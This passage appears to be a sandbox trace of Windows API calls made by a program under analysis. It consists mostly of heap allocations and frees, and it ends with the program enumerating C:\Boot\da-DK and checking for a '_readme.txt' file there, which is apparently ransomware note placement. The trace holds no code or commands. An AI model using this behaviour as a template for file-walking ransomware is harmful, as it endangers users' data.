(HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.146] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.149] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0058.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.149] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.150] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.150] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.150] PathFindFileNameW (pszPath="") returned="" [0058.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.150] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.150] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.150] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0058.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.150] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5d1d0 [0058.150] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0058.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.150] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0058.151] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.151] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.151] HeapFree 